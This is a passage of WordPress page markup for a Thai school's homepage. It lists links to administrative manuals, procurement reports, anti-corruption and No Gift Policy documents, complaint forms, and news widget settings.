คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container 